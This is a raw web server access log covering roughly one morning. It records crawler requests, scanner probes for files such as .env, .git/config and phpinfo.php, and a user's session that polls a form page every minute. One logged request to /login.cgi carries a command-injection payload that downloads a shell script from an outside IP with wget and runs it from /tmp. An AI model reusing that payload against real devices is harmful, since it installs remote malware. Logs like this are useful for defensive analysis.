3.133.12.226 - - [21/Jan/2025:08:16:50 +0100] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.135 - - [21/Jan/2025:08:17:17 +0100] "GET /renault.2web.at/stats/lang/awstats-lv.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
3.133.12.226 - - [21/Jan/2025:08:19:03 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
156.59.198.136 - - [21/Jan/2025:08:21:18 +0100] "GET /renault.2web.at/stats/lang/awstats-eu.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
157.66.55.50 - - [21/Jan/2025:08:33:43 +0100] "GET / HTTP/1.1" 200 274 "-" "Python/3.10 aiohttp/3.11.11"
92.255.57.58 - - [21/Jan/2025:08:44:43 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.59.198.136 - - [21/Jan/2025:08:51:53 +0100] "GET /renault.2web.at/stats/lang/awstats-et.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
90.156.249.18 - - [21/Jan/2025:08:55:39 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
156.59.198.135 - - [21/Jan/2025:08:59:32 +0100] "GET /renault.2web.at/stats/lang/awstats-th.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
64.62.156.53 - - [21/Jan/2025:09:01:14 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15"
146.19.24.168 - - [21/Jan/2025:09:01:38 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
64.62.156.65 - - [21/Jan/2025:09:04:52 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/92.0.4515.159 Safari/537.36"
64.62.156.54 - - [21/Jan/2025:09:05:48 +0100] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15"
64.62.156.64 - - [21/Jan/2025:09:06:29 +0100] "GET /info.php HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15"
156.59.198.135 - - [21/Jan/2025:09:06:36 +0100] "GET /renault.2web.at/stats/lang/awstats-pl.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
64.62.156.57 - - [21/Jan/2025:09:06:40 +0100] "GET /phpinfo.php HTTP/1.1" 200 10189 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0"
64.62.156.57 - - [21/Jan/2025:09:06:42 +0100] "GET /dashboard/phpinfo.php HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
156.59.198.135 - - [21/Jan/2025:09:10:37 +0100] "GET /docs/contadino/ANGEBOT/AG17-000005.pdf HTTP/1.0" 404 305 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [21/Jan/2025:09:14:37 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202002061303_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
3.14.68.101 - - [21/Jan/2025:09:14:52 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
88.170.10.48 - - [21/Jan/2025:09:26:29 +0100] "GET /.env HTTP/1.1" 404 280 "-" "python-requests/2.28.1"
146.70.52.233 - - [21/Jan/2025:09:33:38 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
156.59.198.136 - - [21/Jan/2025:09:34:39 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00002.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [21/Jan/2025:09:44:48 +0100] "GET /renault.2web.at/stats/lang/awstats-cz.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [21/Jan/2025:09:48:48 +0100] "GET /ed-test.activities.at/stats/lang/awstats-hr.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [21/Jan/2025:09:52:48 +0100] "GET /docs/contadino/ANGEBOT/AG17-000003.pdf HTTP/1.0" 404 305 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [21/Jan/2025:09:59:34 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202101221803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.255.57.58 - - [21/Jan/2025:10:01:56 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.181.190.248 - - [21/Jan/2025:10:13:38 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
205.210.31.56 - - [21/Jan/2025:10:15:58 +0100] "\x16\x03\x01" 400 383 "-" "-"
205.210.31.56 - - [21/Jan/2025:10:15:58 +0100] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.135 - - [21/Jan/2025:10:19:35 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911141503_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.94.145.70 - - [21/Jan/2025:10:22:28 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
156.59.198.135 - - [21/Jan/2025:10:23:36 +0100] "GET /renault.2web.at/stats/lang/awstats-cn.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.186.69 - - [21/Jan/2025:10:27:46 +0100] "GET /layout.php HTTP/1.1" 200 815 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:27:47 +0100] "GET /entry.php?id=10273 HTTP/1.1" 200 1903 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:27:47 +0100] "GET /entry.php?id=11412 HTTP/1.1" 200 1760 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:27:47 +0100] "GET /entry.php?id=10270 HTTP/1.1" 200 909 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:27:47 +0100] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:27:47 +0100] "GET /gui/javascript/jquery/css/gui-themes/custom.min.css HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:27:47 +0100] "GET /gui/javascript/jquery/css/gui-themes/ui.spinner.css HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:27:47 +0100] "GET /gui/javascript/form_form.js?1737451667 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:27:47 +0100] "GET /gui/javascript/jquery/css/gui-themes/jquery.tooltip.css HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:27:47 +0100] "GET /gui/javascript/jquery/js/jquery-ui-1.9.0.custom.min.js HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:27:47 +0100] "GET /gui/javascript/jquery/js/jquery-1.8.2.js HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:27:47 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 935 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:27:47 +0100] "GET /entry.php?id=10287 HTTP/1.1" 200 2419 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:27:47 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 1903 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:27:47 +0100] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:27:49 +0100] "POST /entry.php?id=10287& HTTP/1.1" 200 1966 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:28:52 +0100] "GET /gui/javascript/form_form.js?1737451732 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:28:53 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:28:53 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 2012 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:28:53 +0100] "GET /gui/javascript/form_form.js?1737451733 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:28:53 +0100] "GET /entry.php?id=10270&__app__=10006038 HTTP/1.1" 200 2229 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:28:53 +0100] "GET /undefined HTTP/1.1" 404 289 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:28:53 +0100] "GET /framework/webfx/style/toolbar/images/cbback.gif HTTP/1.1" 404 318 "http://hausegger.activities.at/framework/webfx/style/toolbar/cb2.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
92.255.57.58 - - [21/Jan/2025:10:29:40 +0100] "\x16\x03\x01\x05\xa8\x01" 400 383 "-" "-"
178.165.186.69 - - [21/Jan/2025:10:29:53 +0100] "GET /entry.php?id=10271&&ser=451733 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:29:53 +0100] "GET /gui/javascript/form_form.js?1737451793 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=451733" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:30:53 +0100] "GET /entry.php?id=10271&&ser=451793 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=451733" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:30:53 +0100] "GET /gui/javascript/form_form.js?1737451853 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=451793" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:31:54 +0100] "GET /entry.php?id=10271&&ser=451853 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=451793" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:31:54 +0100] "GET /gui/javascript/form_form.js?1737451914 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=451853" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:32:54 +0100] "GET /entry.php?id=10271&&ser=451914 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=451853" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:32:54 +0100] "GET /gui/javascript/form_form.js?1737451974 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=451914" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:33:54 +0100] "GET /entry.php?id=10271&&ser=451974 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=451914" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:33:54 +0100] "GET /gui/javascript/form_form.js?1737452034 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=451974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:34:54 +0100] "GET /entry.php?id=10271&&ser=452034 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=451974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:34:55 +0100] "GET /gui/javascript/form_form.js?1737452095 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=452034" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:35:55 +0100] "GET /entry.php?id=10271&&ser=452095 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=452034" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:35:55 +0100] "GET /gui/javascript/form_form.js?1737452155 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=452095" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
146.19.24.168 - - [21/Jan/2025:10:36:43 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
178.165.186.69 - - [21/Jan/2025:10:36:55 +0100] "GET /entry.php?id=10271&&ser=452155 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=452095" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:36:55 +0100] "GET /gui/javascript/form_form.js?1737452215 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=452155" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:37:55 +0100] "GET /entry.php?id=10271&&ser=452215 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=452155" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:37:56 +0100] "GET /gui/javascript/form_form.js?1737452275 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=452215" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:38:56 +0100] "GET /entry.php?id=10271&&ser=452275 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=452215" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:38:56 +0100] "GET /gui/javascript/form_form.js?1737452336 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=452275" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
95.214.55.43 - - [21/Jan/2025:10:39:44 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
178.165.186.69 - - [21/Jan/2025:10:39:56 +0100] "GET /entry.php?id=10271&&ser=452336 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=452275" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:39:56 +0100] "GET /gui/javascript/form_form.js?1737452396 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=452336" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
156.59.198.136 - - [21/Jan/2025:10:40:03 +0100] "GET /renault.2web.at/stats/lang/awstats-hr.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.186.69 - - [21/Jan/2025:10:40:56 +0100] "GET /entry.php?id=10271&&ser=452396 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=452336" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:40:56 +0100] "GET /gui/javascript/form_form.js?1737452456 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=452396" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:41:57 +0100] "GET /entry.php?id=10271&&ser=452456 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=452396" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:41:57 +0100] "GET /gui/javascript/form_form.js?1737452517 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=452456" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:42:57 +0100] "GET /entry.php?id=10271&&ser=452517 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=452456" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:42:57 +0100] "GET /gui/javascript/form_form.js?1737452577 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=452517" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:43:57 +0100] "GET /entry.php?id=10271&&ser=452577 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=452517" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:43:57 +0100] "GET /gui/javascript/form_form.js?1737452637 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=452577" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
156.59.198.136 - - [21/Jan/2025:10:44:03 +0100] "GET /docs/contadino/2017/GS17-000002.pdf HTTP/1.0" 404 301 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.186.69 - - [21/Jan/2025:10:44:59 +0100] "GET /entry.php?id=10271&&ser=452637 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=452577" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:44:59 +0100] "GET /gui/javascript/form_form.js?1737452699 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=452637" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:46:00 +0100] "GET /entry.php?id=10271&&ser=452699 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=452637" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:46:00 +0100] "GET /gui/javascript/form_form.js?1737452760 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=452699" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:47:00 +0100] "GET /entry.php?id=10271&&ser=452760 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=452699" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:47:00 +0100] "GET /gui/javascript/form_form.js?1737452820 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=452760" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:48:00 +0100] "GET /entry.php?id=10271&&ser=452820 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=452760" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:48:00 +0100] "GET /gui/javascript/form_form.js?1737452880 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=452820" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
156.59.198.136 - - [21/Jan/2025:10:48:03 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00012.pdf HTTP/1.0" 404 309 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.186.69 - - [21/Jan/2025:10:49:00 +0100] "GET /entry.php?id=10271&&ser=452880 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=452820" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:49:01 +0100] "GET /gui/javascript/form_form.js?1737452941 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=452880" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:50:01 +0100] "GET /entry.php?id=10271&&ser=452941 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=452880" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:50:01 +0100] "GET /gui/javascript/form_form.js?1737453001 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=452941" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:51:01 +0100] "GET /entry.php?id=10271&&ser=453001 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=452941" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [21/Jan/2025:10:51:01 +0100] "GET /gui/javascript/form_form.js?1737453061 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=453001" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
